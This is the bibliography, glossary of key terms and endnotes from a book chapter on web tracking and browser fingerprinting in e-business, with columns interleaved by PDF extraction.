Davidov, M. (2011). The Double-Edged Sword Goldfarb, A., & Tucker, C. E. (2011, January). of HSTS Persistence and Privacy. Leviathan Privacy Regulation and Online Advertising. Security Group. Retrieved November 13, 2012, Management Science, 57(1), 57–71. doi:10.1287/ from http://www.leviathansecurity.com/blog/ mnsc.1100.1246. archives/12-The-Double-Edged-Sword-of-HSTS- Goldfarb, A., & Tucker, C. E. (2011). Online Persistence-and-Privacy.html advertising, behavioral targeting, and privacy. Davis, J. (2000). American consumers will force Communications of the ACM, 54(5), 25–27. e-tailers to just say no to dynamic pricing. Info- doi:10.1145/1941487.1941498. World, 22(41), 116. Golle, P., & Partridge, K. (2009). On the Ano- Eckersley, P. (2010). How unique is your web nymity of Home/Work Location Pairs. In H. browser? In M. J. Atallah, & N. J. Hopper (Eds.), Tokuda, M. Beigl, A. Friday, A. J. Brush, & Y. Privacy Enhancing Technologies: 10th Interna- Tobe (Eds.), Pervasive Computing: 7th Interna- tional Symposium, PETS 2010, Berlin, Germany, tional Conference, Pervasive 2009, Nara, Japan, July 21-23, 2010. Proceedings (pp. 1-18). Heidel- May 11-14, 2009. Proceedings (pp. 390-397). berg: Springer-Verlag Berlin. doi:10.1007/978-3- Berlin, Germany: Springer-Verlag. http://dx.doi. 642-14527-8_1 org/10.1007/978-3-642-01516-8_26. Efrati, A. (2011, May). ‘Like’ Button Follows Gomez, J., Pinnick, T., Soltani, A., Carver, B., Web Users. The Wall Street Journal. Retrieved Makker, S., & Mccans, M. (2009). Know Privacy. November 13, 2012, from http://online.wsj.com/ Technical report. Retrieved November 13, 2012, article/SB100014240527487042815045763294 from http://knowprivacy.org/report/KnowPri- 41432995616.html vacy_Final_Report.pdf Feher, C., Elovici, Y., Moskovitch, R., Rokach, Grossmann, J. (2007, April 20). Tracking users L., & Schclar, A. (2012). User Identity Verifica- with Basic Auth [Web log comment]. Weblog. tion via Mouse Dynamics. Journal Information Retrieved from http://jeremiahgrossman.blogspot. Sciences: An International Journal, 201, 19–36. hu/2007/04/tracking-users-without-cookies.html doi:10.1016/j.ins.2012.02.066. (2012, November 13 G. Felten, E. W., & Schneider, M. A. (2000). Tim- Gulyás (2009). Facebook – The Big Brother is ing Attacks on Web Privacy. In Proceedings of watching you [Web log comment]. Retrieved the 7th ACM conference on Computer and Com- from http://pet-portal.eu/blog/read/174/ (2012, munications Security (pp. 25–32). New York: November 13) ACM Press. Retrieved from http://doi.acm. Gulyás, G. Gy., Schulcz, R., & Imre, S. (2008). org/10.1145/352600.352606 Comprehensive analysis of web privacy and FireGloves. (2012). FireGloves 1.2.3. Add-ons anonymous web browsers: Are next generation for Firefox. Retrieved November 13, 2012, from services based on collaborative filtering? In L. https://addons.mozilla.org/hu/firefox/addon/ Capra, I. Wakeman, N. Foukia, & S. Marsh (Eds.), firegloves/ Proceedigns of the Joint SPACE and TIME Work- shops 2008 (Part of IFIPTM 2008 - Joint iTrust and Fitzpatrick, A. (2012). ‘Politwoops’ Collects PST Conferences on Privacy, Trust Management Politicians’ Deleted Tweets. Mashable. Retrieved and Security) (pp. 17-32). Trondheim, Norway. November 13, 2012, from http://mashable. com/2012/05/30/politwoops/
161 Tracking and Fingerprinting in E-Business
Gulyás, G. G., Schulcz, R., & Imre, S. (2012). Jakobsson, M., Juels, A., & Ratkiewicz, J. (2008). Separating Private and Business Identities. In Privacy-Preserving History Mining for Web R. Sharman, S. Das Smith – M. Gupta (Eds.), Browsers. In Proceedings of the Web 2.0 Secu- Digital Identity and Access Management: Tech- rity and Privacy 2008. Washington, DC: IEEE nologies and Frameworks (pp. 114-132). Her- Computer Society. shey, PA: Information Science Reference. doi: Jakobsson, M., & Stamm, S. (2006). Invasive doi:10.4018/978-1-61350-498-7.ch007. Browser Sniffing and Countermeasures. In Pro- Huang, D., Yang, K., Ni, C., Teng, W., Hsiang, ceedings of the 15th International Conference T., & Lee, Y. (2012). Clock Skew Based Client on World Wide Web (pp. 523–532). New York: Device Identification in Cloud Environments. In ACM Press. Retrieved from http://doi.acm. Proceedings of 2012 IEEE 26th International org/10.1145/1135777.1135854. Conference on Advanced Information Networking Jakobsson, M., & Stamm, S. (2007). Web Cam- and Applications (pp. 526–533). Fukuoka, Japan: ouflage: Protecting Your Clients from Browser- IEEE. Retrieved from http://doi.ieeecomputerso- Sniffing Attacks. Security and Privacy, IEEE, ciety.org/10.1109/AINA.2012.51 5(6), 16–24. doi:10.1109/MSP.2007.182. Huber, M., Mulazzani, M., & Weippl, E. (2010). Janc, A., & Olejnik, L. (2010). Feasibility and Tor http usage and information leakage. In B. Real-World Implications of Web Browser His- De Decker, & I. Schaumüller-Bichl (Eds.), Com- Proceedings of the Web 2.0 munications and Multimedia Security: 11th IFIP tory Detection. In Security and Privacy 2010 TC 6/TC 11 International Conference, CMS 2010, . Washington, DC: IEEE Computer Society. Linz, Austria, May 31 – June 2, 2010. Proceedings (pp. 245-255). Berlin, Germany: Springer-Verlag. Janc, A., & Olejnik, L. (2010). Web Browser His- http://dx.doi.org/10.1007/978-3-642-13241-4_22 tory Detection as a Real-World Privacy Threat. In D. Gritzalis, B. Preneel, & M. Theoharidou Interactive Advertising Bureau (IAB). (2012, June (Eds.), Computer Security – ESORICS 2010: 15th 11). Internet Advertising Revenues Set First Quar- European Symposium on Research in Computer ter Record at $8.4 Billion. Interactive Advertising Security, Athens, Greece, September 20-22, 2010. Bureau Press Release. Retrieved November 13, Proceedings (pp. 215–231). Berlin, Germany: 2012, from http://www.iab.net/about_the_iab/ Springer-Verlag. recent_press_releases/press_release_archive/ press_release/pr-061112 Jang, D., Jhala, R., Lerner, S., & Shacham, H. (2010). An Empirical Study of Privacy-Violating IpToCountry. (2012). FREE IP to Country Data- Information Flows in JavaScript Web Applica- base. WEBNet77. Retrieved November 13, 2012, tions. In Proceedings of the 17th ACM conference from http://software77.net/geo-ip/ on Computer and communications security (pp. Jackson, C., Bortz, A., Boneh, D., & Mitchell, J. 270–283). New York: ACM Press. Retrieved from C. (2006). Protecting Browser State from Web http://doi.acm.org/10.1145/1866307.1866339 Privacy Attacks. In Proceedings of the 15th In- JonDo. (2012). JonDoFox – Anonymous and ternational Conference on World Wide Web (pp. secure web surfing. JondoNym – The anonimi- 737–744). New York: ACM Press. Retrieved from sation service. Retrieved November 13, 2012, http://doi.acm.org/10.1145/1135777.1135884 from https://anonymous-proxy-servers.net/en/ jondofox.html
162 Tracking and Fingerprinting in E-Business
JonDo Test. (2012). IP Check: Next generation Local Shared Objects. (2012). Local shared object. of website tracking analysis. JondoNym – The Wikipedia. Retrieved November 13, 2012, from anonimisation service. Retrieved November 13, http://en.wikipedia.org/wiki/Local_shared_object 2012, from http://ip-check.info/description.php Loveless, A. (2011). EU Cookie Law – It ain’t Kamkar, S. (2010, September 20). Evercookie. all about cookies (or browsers). Enchilada. Re- Samy Kamkar’s homepage. Retrieved November trieved November 13, 2012, from http://www. 13, 2012, from http://samy.pl/evercookie/ enchiladadigital.com/2011/07/24/eu-cookie-law- cookies-browsers/ Kohno, T., Broido, A., & Claffy, K. C. (2005). Remote physical device fingerprinting. IEEE Mansour. (2011). visipisi. Retrieved November Transactions on Dependable and Secure Comput- 13, 2012, from http://oxplot.github.com/visipisi/ ing, 2(2), 93–108. doi:10.1109/TDSC.2005.26. visipisi.html Kontaxis, G., Polychronakis, M., Keromytis, A. Marhsall, J. (2011). Device Fingerprinting Could D., & Markatos, E. P. (2012). Privacy-Preserving Be Cookie Killer. ClickZ – Marketing News & Ex- Social Plugins. In Proceedings of the 21st USENIX pert Advice. Retrieved November 13, 2012, from Conference on Security Symposium (pp. 30-30). http://www.clickz.com/clickz/news/2030243/ Berkeley, CA: USENIX Association. device-fingerprinting-cookie-killer Krane, D. (2008). Majority Uncomfortable with Mayer, J. (2009). “Any person... a pamphleteer” Websites Customizing Content Based Visitors Internet Anonymity in the Age of Web 2.0. Un- Personal Profiles. Harris Interactive press release. published thesis. Retrieved November 13, 2012, Retrieved November 13, 2012, from http://www. from http://www.stanford.edu/~jmayer/papers/ harrisinteractive.com/vault/Harris-Interactive- thesis09.pdf Poll-Research-Majority-Uncomfortable-with- Mayer, J. R., & Mitchell, J. C. (2012). Third-Party Websites-Customizing-C-2008-04.pdf Web Tracking: Policy and Technology. In Proceed- Krishnamurthy, B. (2010). Privacy leakage on the ings of the 2012 IEEE Symposium on Security and Internet. Presented at 77th Internet Engineering Privacy (pp. 413-427). Washington, DC: IEEE Task Force. Anaheim, CA. Computer Society. Retrieved fromhttp://dx.doi. org/10.1109/SP.2012.47 Krishnamurthy, B., & Wills, C. E. (2006). Gen- erating a privacy footprint on the Internet. In McDonald, A. M., & Cranor, L. F. (2010). Beliefs Proceedings of the 6th ACM SIGCOMM Confer- and behaviors: Internet users’ understanding of ence on Internet Measurement (pp. 65-70). New behavioral advertising. In Proceedings of the 38th York: ACM Press. Retrieved from http://doi.acm. Research Conference on Communication, Infor- org/10.1145/1177080.1177088. mation and Internet Policy. Arlington, VA: TPRC. Krishnamurthy, B., & Wills, C. E. (2009). Privacy Miller, T. (2002). Passive OS Fingerprinting: De- diffusion on the web: A longitudinal perspective. tails and Techniques. The SANS institute. Retrieved In Proceedings of the 18th International Confer- November 13, 2012, from http://www.ouah.org/ ence on World Wide Web (pp. 541-550). New incosfingerp.htm York: ACM Press. Retrieved from http://doi.acm. org/10.1145/1526709.1526782
163 Tracking and Fingerprinting in E-Business
Mowery, K., Bogenreif, D., Yilek, S., & Shacham, Pfitzmann, A., & Hansen, M. (2010). A terminol- H. (2011). Fingerprinting Information in JavaS- ogy for talking about privacy by data minimiza- cript Implementations. In Proceedings of the Web tion: Anonymity, Unlinkability, Undetectability, 2.0 Security and Privacy 2011. Washington, DC: Unobservability, Pseudonymity, and Identity IEEE Computer Society. Management. Privacy and Data Security, TU Dresden, Faculty of Computer Science, Institute Mowery, K., & Shacham, H. (2012). Pixel Perfect: of Systems Architecture. Retrieved November Fingerprinting Canvas in HTML5. In Proceed- 13, 2012, from http://dud.inf.tu-dresden.de/ ings of the Web 2.0 Security and Privacy 2012. Anon_Terminology.shtml Washington, DC: IEEE Computer Society. Regalado, A. (2012, June 22). Online Ads That Mulliner, C. (2010). Random tales from a mobile Know Who You Know. MIT Technology Review. phone hacker. Presented at CanSecWest 2010. Retrieved November 13, 2012, from http://www. Vancouver, WA. technologyreview.com/news/428048/online-ads- Norbert. (2011). Web browser fingerprinting. that-know-who-you-know/ SecurityAnaly.st Blog. Retrieved from http:// Reschl, P., Mulazzani, M., Huber, M., & Weippl, securityanaly.st/browser-fingerprinting/ E. (2011). Poster Abstract: Efficient Browser Iden- Oracle. (2011). Oracle Adaptive Access Manager. tification with JavaScript Engine Fingerprinting. Oracle Fusion Middleware. Retrieved November In Proceedings of the Annual Computer Security 13, 2012, from http://www.oracle.com/tech- Applications Conference 2011 (ACSAC). Orlando, network/middleware/id-mgmt/oaam11gr1ps1- FL: ACM. ds-398161.pdf Roesner, F., Kohno, T., & Wetherall, D. (2012). Perry, M. (April 10, 2011). Torbutton Design Detecting and Defending Against Third-Party Documentation. Technical report. Retrieved No- Tracking on the Web. In Proceedings of 9th USE- vember 13, 2012, from https://www.torproject. NIX Symposium on Networked Systems Design org/torbutton/en/design/#fingerprinting and Implementation (pp. 12-12). Berkeley, CA: USENIX Association. Perry, M. (2011, April 9). Ticket #2872: Limit the fonts available in TorBrowser. Tor Bug Tracker & Ruef, M. (2008). Browserrecon. Browserrecon Wiki. Retrieved November 13, 2012, from https:// project – Advanced web browser fingerprinting. trac.torproject.org/projects/tor/ticket/2872 Retrieved November 13, 2012, from http://www. computec.ch/projekte/browserrecon/ Perry, M. (2011, September 26). Ticket #4099: Disable TLS Session resumption and Session IDs. Schmücker, N. (2011). Web Tracking. Technical Tor Bug Tracker & Wiki. Retrieved November 13, report. Retrieved November 13, 2012, from http:// 2012, from https://trac.torproject.org/projects/tor/ www.snet.tu-berlin.de/fileadmin/fg220/courses/ ticket/4099 SS11/snet-project/web-tracking_schmuecker.pdf Perry, M., Clark, E., & Murdoch, S. (2011, Shankland, S. (2010). Google real-time search: December 28). The Design and Implementation 6 min. to spot quake. Deep Tech – CNET News. of the Tor Browser. Technical report. Retrieved Retrieved November 13, 2012, from http://news. November 13, 2012, from https://www.torproject. cnet.com/8301-30685_3-10428590-264.html org/projects/torbrowser/design/
164 Tracking and Fingerprinting in E-Business
Simpson, G. H. (2005, March 31). United Virtuali- TRUSTe. (2009). 2009 Study: Consumer Attitudes ties develops ID backup to cookies, Browser-Based About Behavioral Targeting. Research report. ‘Persistent Identification Element’ will also restore Retrieved November 13, 2012, from http://www. erased cookie. Whiptech Technologies. Retrieved truste.com/pdf/TRUSTe_TNS_2009_BT_Study_ November 13, 2012, from http://www.whiptech. Summary.pdf com/services.security/PIE.and.Cookies.html TRUSTe & Harris Interactive. (2011). Privacy Soltani, A. (2011) Respawn redux (Follow up to and online behavioral advertising. Retrieved Flash Cookies and Privacy II). Ashkan Soltani’s November 13, 2012, from http://truste.com/ad- homepage. Retrieved November 13, 2012, from privacy/TRUSTe-2011-Consumer-Behavioral- http://ashkansoltani.org/docs/respawn_redux. Advertising-Survey-Results.pdf html Turow, J., King, J., Hoofnagle, C. J., Bleakley, A., Soltani, A., Canty, S., Mayo, Q., Thomas, L., & & Hennessy, M. (2009). Americans reject tailored Hoofnagle, C. J. (2009, August 10). Flash Cookies advertising and three activities that enable it. Social and Privacy. Social Science Research Network. Science Research Network. Retrieved November Retrieved November 13, 2012, from http://ssrn. 13, 2012, from http://papers.ssrn.com/sol3/papers. com/abstract=1446862 cfm?abstract_id=1478214 Stamm, S. (2010). Plugging the CSS History Viecco, C. (2012). Bug 732096 – Add a prefer- Leak. Mozilla Security Blog. Retrieved November ence to prevent local font enumeration. Bug- 13, 2012, from https://blog.mozilla.org/secu- zilla@Mozilla. Retrieved November 13, 2012, rity/2010/03/31/plugging-the-css-history-leak/ from https://bugzilla.mozilla.org/show_bug. cgi?id=732096 Stat Owl. (2012). Rich Internet Application Market Share. Retrieved November 13, 2012, from http:// Wang, Y., Burgener, D., Flores, M., Kuzmanovic, www.statowl.com/custom_ria_market_penetra- A., & Huang, C. (2011). Towards Street-Level tion.php Client-Independent IP Geolocation. In Proceed- ings of the 8th USENIX Conference on Networked The Simple Computer. (2012, June 10). Coping Systems Design and Implementation (pp. 27-41). Mechanisms: Fingerprinting, CDI and How to Berkeley, CA: USENIX Association. Deal with it. the_simple_computer, digital security and privacy made easy. Retrieved November 13, Weinberg, Z., Chen, E. Y., Jayaraman, P. R., & 2012, from http://thesimplecomputer.info/finger- Jackson, C. (2011). I Still Know What You Visited printing-and-clientless-device-identification.html Last Summer: Leaking Browsing History via User Interaction and Side Channel Attacks. In Proceed- ThreatMetrix. (2012). ThreatMetrix™ Cyber- ings of the 2011 IEEE Symposium on Security and crime Defender Platform Datasheet. ThreatMetrix Privacy (pp. 147–161). Washington, DC: IEEE | Advanced Cybercrime Prevention Solutions. Computer Society. Retrieved fromhttp://dx.doi. Retrieved November 13, 2012, from http://www. org/10.1109/SP.2011.23 threatmetrix.com/docs/ThreatMetrix-Cyber- crime-Defender-Platform.pdf Wondracek, G., Holz, T., Kirda, E., & Kruegel, C. (2010). A Practical Attack to De-Anonymize Tor. (2012). Tor Browser Bundle. Tor Project. Social Network Users. In Proceedings of the Retrieved November 13, 2012, from https://www. 2010 IEEE Symposium on Security and Privacy torproject.org/projects/torbrowser.html.en (pp. 223–238). Washington, DC: IEEE Computer Society. doi: 10.1109/SP.2010.21.
165 Tracking and Fingerprinting in E-Business
Wramner, H. (2011). Tracking Users on the World advertising (i.e., when advertisements are tailored Wide Web.Unpublished Master’s thesis. Retrieved to predicted user behavior). November 13, 2012, from http://www.nada.kth. Fingerprint: Set of attributes or settings that se/utbildning/grukth/exjobb/rapportlistor/2011/ is uniquely identifying for a selected entity within rapporter11/wramner_henrik_11041.pdf a set of others (e.g., browser/device of a visitor among other visitors). Yampolskiy, R. V., & Govindaraju, V. (2008). History Stealing: Also referred to as history Behavioural biometrics: A survey and classifica- leakage, history detection or history sniffing, his- tion. International Journal of Biometrics, 1(1), tory stealing is a way of extracting a part of the 81–113. doi:10.1504/IJBM.2008.018665. history of the browser (or other state-descriptive Yen, T., Huang, X., Monrose, F., & Reiter, M. information) without the consent of the user. K. (2009). Browser Fingerprinting from Coarse Such an attack normally cannot acquire the entire Traffic Summaries: Techniques and Implications. browsing history; the adversary must choose a set In U. Flegel, & D. Bruschi (Eds.), Detection of of addresses to check before delivering the attack. Intrusions and Malware, and Vulnerability As- Identification, Tracking, and Profiling: In sessment: 6th International Conference, DIMVA the context of the Web, these terms refer to the act 2009, Como, Italy, July 9-10, 2009. Proceedings of a website uniquely identifying visitors, tracking (pp. 157–175). Berlin, Germany: Springer-Verlag. theirs actions in order to create profiles on them. http://dx.doi.org/10.1007/978-3-642-02918-9_10 These profiles are later monetized; for example, by showing advertisements tailored for the profile, Yue, C., & Wang, H. (2009). Characterizing and therefore to the preferences of the visitor. Insecure JavaScript Practices on the Web. In Pro- Implicit and Explicit Data: Explicit data ceedings of the 18th International Conference on refers to some piece of information communicated World wide Web (pp. 961-970). New York: ACM by the client (e.g., user agent string) or published Press. doi:10.1.1.153.3166. on the Web, while implicit data refers to informa- Zalewski, M. (2011). Rapid history extraction tion that can be extrapolated from the actions, through non-destructive cache timing (v8). [lcam- behavior, status, attributes, and so forth, of the tuf.coredump.cx]. Retrieved November 13, 2012, client or from other explicit data. from http://lcamtuf.coredump.cx/cachetime/ Storage-Based Tracking: Regular tracking techniques store an identifier on the client (e.g., as browser cookies) in order to be able to identify returning visitors and monitor their activities. KEY TERMS AND DEFINITIONS
Anonymity Paradox: The problem of in- ENDNOTES creasing identifiability when concealing (private) information. In other words, a user is likely to end 1 http://www.clicktale.com up in a rather small anonymity set if the substitute 2 Also called Web beacons, clear GIFs, 1x1 (fake) information is not chosen carefully. GIFs, tracking pixels, pixel tags or simply Behavioral Tracking and Advertising: A way pixels. of observing and analyzing the user’s interaction 3 Firesheep raised awareness on Facebook ses- with one or more Websites, rather than simply sion cookies transmitted without protection: registering Webpage downloads. The collected http://codebutler.github.com/firesheep/ information may include the contents of the clip- 4 Stealing Gmail session cookies via ac- board, mouse heatmaps, keystrokes, scroll reach, tive sidejacking: http://seclists.org/bug- and so forth, which is later used for behavioral traq/2007/Aug/70 166